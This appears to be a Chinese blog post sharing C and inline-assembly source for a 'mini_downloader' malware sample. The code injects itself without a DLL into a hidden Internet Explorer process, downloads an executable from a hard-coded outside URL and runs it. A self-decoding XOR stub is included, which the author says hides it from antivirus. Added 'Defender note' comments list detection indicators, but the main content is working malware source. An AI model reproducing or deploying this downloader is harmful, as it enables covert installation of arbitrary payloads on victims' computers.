
无dll插入进程

2014-05-20 22:33 323 查看

/*

"mini_downloader"

code by kardinal p.s.t

compile by vc++ 6.0

cannot run under Win98;

*/

#include <windows.h>

#pragma comment(lib,"user32.lib")

#pragma comment(lib,"kernel32.lib")

//#pragma comment(linker, "/opt:nowin98") // uncomment these 4 linker lines to build a ~2 KB executable

//#pragma comment(linker, "/merge:.data=.text")

//#pragma comment(linker, "/merge:.rdata=.text")

//#pragma comment(linker, "/align:0x200")

#pragma comment(linker, "/entry:decrpt")

#pragma comment(linker, "/subsystem:windows")

#pragma comment(linker, "/base:0x13150000")

// Late-bound Win32 entry points and shared state. None of the three APIs below
// is in the import table; each pointer is filled by getprocaddress at run time
// (see download() and main()).
// Defender note: an image that imports almost nothing and resolves exactly this
// set (ShellExecuteA, URLDownloadToFileA, CreateRemoteThread) by name at run
// time is itself a strong static indicator for this kind of downloader.
hinstance (winapi *shellrun)(hwnd,lpctstr, lpctstr, lpctstr ,lpctstr , int );// shell32.dll!ShellExecuteA, resolved in download()

dword (winapi *downfile) (lpctstr ,lpctstr, lpctstr ,dword, lpctstr);// urlmon.dll!URLDownloadToFileA, resolved in download()

handle (winapi *myinject) (handle, lpsecurity_attributes, dword,lpthread_start_routine, lpvoid, dword, lpdword); // kernel32.dll!CreateRemoteThread, resolved in main()

handle processhandle; // handle to the target process, opened in main()

dword pid; // process id of the owner of the located browser window, filled in main()

hinstance hshell,hurlmon,hkernel; // module handles for shell32 / urlmon / kernel32

// Payload routine. It is not called in this process: main() passes its address
// as the start routine of a thread created inside the target process, after
// the whole image has been copied there (see main()). Everything it touches is
// either an API resolved here by name or a constant baked into the image, which
// is presumably what lets it run from the copied image.
// Observable behaviour inside the host process: LoadLibrary of shell32 and
// urlmon, a download of a hard-coded URL to c:\ieinst12.exe, ShellExecute of
// that file, then ExitProcess -- which terminates the host (the browser), not
// the injector. No return value is checked.
void download() // download routine executed by the injected thread

{

hshell=loadlibrary("shell32.dll");

hurlmon=loadlibrary("urlmon.dll");

(farproc&)shellrun=getprocaddress(hshell,"shellexecutea"); // C++ reference cast: assign through a farproc lvalue

(farproc&)downfile= getprocaddress(hurlmon,"urldownloadtofilea");

downfile(null,"http://www.testtest.ac.cn/eeeeeeeeeeeeee ... eeeeen/notepad.exe","c:\\ieinst12.exe",0, null); // URL -> c:\ieinst12.exe (the URL text is truncated on this page)

shellrun(0,"open","c:\\ieinst12.exe",null,null,5); // show command 5 = SW_SHOW

exitprocess(0); // ends whichever process this thread is running in

};

// Injector. Despite the name this is not the CRT entry point: the linker entry
// is decrpt() (see /entry:decrpt), which calls main() once the code has been
// decoded in place. Steps (the numbered comments below are the author's):
//   1. start iexplore.exe hidden,
//   2. find its window (class "ieframe") and open the process with full access,
//   3. read this image's SizeOfImage from its own PE header and reserve the
//      same range, at the same base address, inside the target (RWX),
//   4. copy the whole image over and start a remote thread at download(),
//   5. close the process handle.
// Defender note: OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx(PAGE_EXECUTE_READWRITE)
// -> WriteProcessMemory -> CreateRemoteThread against a freshly started browser
// is the canonical injection chain that endpoint telemetry keys on; an RWX
// allocation at the injector's own image base and a remote thread whose start
// address lies in private (non-image) memory are further tells. No return
// value in this function is checked, so any failure falls through silently.
void main() // injector body, called from decrpt()

{

//1. Build the path of iexplore.exe from the drive of the Windows directory and start it hidden.

char iename[max_path],iepath[max_path];

zeromemory(iename,sizeof(iename));

zeromemory(iepath,sizeof(iepath));

getwindowsdirectory(iepath,max_path);

strncpy(iename,iepath,3); // keep only "X:\" -- NUL termination comes from the zeromemory above, not from strncpy

strcat(iename,"program files\\internet explorer\\iexplore.exe"); // hard-coded install path

winexec(iename,sw_hide);

sleep(500); // fixed wait for the browser window to appear; there is no retry if it is not there yet

//2. Locate the browser process through its top-level window class and open it.

hwnd htemp;

htemp=findwindow("ieframe",null);

getwindowthreadprocessid(htemp,&pid);

processhandle=openprocess(process_all_access, false, pid);

//3. Reserve memory in the target for a copy of this whole image.

hmodule module;

lpvoid newmodule;

dword size;

lpdword lpimagesize;

module = getmodulehandle(null);// base address of this process's own image

// Read IMAGE_OPTIONAL_HEADER.SizeOfImage straight from the PE header:
// [base+0x3c] = e_lfanew, PE header + 0x50 = SizeOfImage.

_asm

{

push eax;

push ebx;

mov ebx,module;

mov eax,[ebx+0x3c]; // e_lfanew

lea eax,[ebx+eax+0x50]; // &SizeOfImage

mov eax,[eax]

mov lpimagesize,eax; // the value is parked in a pointer-typed local and cast back below

pop ebx;

pop eax;

};

size=(dword)lpimagesize;

newmodule = virtualallocex(processhandle, module, size, mem_commit | mem_reserve, page_execute_readwrite); // request the same base address as here, presumably so absolute addresses in the copy stay valid (cf. the /base linker pragma); the returned address is never compared with module

//4. Copy the image over and run download() in the target.

writeprocessmemory(processhandle, newmodule, module, size, null);// copy this process's image into the target

lpthread_start_routine entrypoint;

// Take the address of download() (a C++ function) as a thread start routine.

__asm

{

push eax;

lea eax,download;

mov entrypoint,eax;

pop eax

}

hkernel=loadlibrary("kernel32.dll");

(farproc&)myinject= getprocaddress(hkernel,"createremotethread"); // CreateRemoteThread resolved by name rather than imported

myinject(processhandle, null, 0, entrypoint, module, 0, null); // start a thread in the target at download(); the thread parameter is the image base

//5. Release the process handle.

closehandle(processhandle);

return;

} ;

//decoding routine (program entry point, see /entry:decrpt)

// Program entry point (linker option /entry:decrpt). The bytes of this image
// between download() and decrpt() are expected to be stored XOR-encoded (the
// encoding step is not on this page; presumably applied to the linked binary).
// This routine saves that region, then brute-forces the single-byte key: for
// each key in 1..0xff it decodes the saved copy back in place and tries to run
// main() under an SEH handler. With a wrong key the region is normally garbage,
// main() faults, the handler swallows the fault and the next key is tried;
// with the right key the injector runs and the routine returns from inside the
// loop.
// Defender note: the observable sequence is VirtualProtectEx turning the
// image's own code page RWX, repeated writes into .text, and a burst of
// first-chance exceptions from the same module -- behavioural signals that do
// not depend on the encoded bytes.
// Assumptions baked in: download() and main() are laid out before decrpt() in
// the image, the region is at most 500 bytes (shellcode[]) and fits inside the
// single 0x1000-byte range made writable; none of this is checked.
void decrpt()

{

handle myps;

dword oldattr;

byte shellcode[500]; // holds the still-encoded copy of the region

zeromemory(shellcode,sizeof(shellcode));

myps=getcurrentprocess();

::virtualprotectex(myps,&download,0x1000,page_execute_readwrite,&oldattr); // make the code starting at download() writable

// Save the original (encoded) bytes from download up to decrpt into shellcode[].

_asm

{

pushad;

lea esi,download

lea edi,shellcode;

lea ecx,decrpt;

sub ecx,esi; // ecx = decrpt - download = number of bytes to copy

en1:

lodsb;

stosb;

dec ecx;

jne en1;

popad;

};

// Decode back into place, one candidate key per iteration.

int i;

for (i=1;i<=0xff;i++)

{

_asm

{

pushad;

lea esi,shellcode;

lea edi,download;

lea ecx,decrpt;

sub ecx,edi; // same byte count as above

en2:

lodsb;

mov ebx,i;

xor al,bl; // bl = low byte of the candidate key i

stosb;

dec ecx;

jne en2;

popad;

};

// Author's note: this try/except wrapper is what they claim keeps ordinary
// antivirus from recognising the code. Mechanically, it lets the loop survive
// a fault from running main() decoded with the wrong key.

__try

{

main();

return; // right key: main() completed, leave decrpt()

}

__except(exception_execute_handler)

{

}; // wrong key: swallow the fault and try the next one

}

return;

};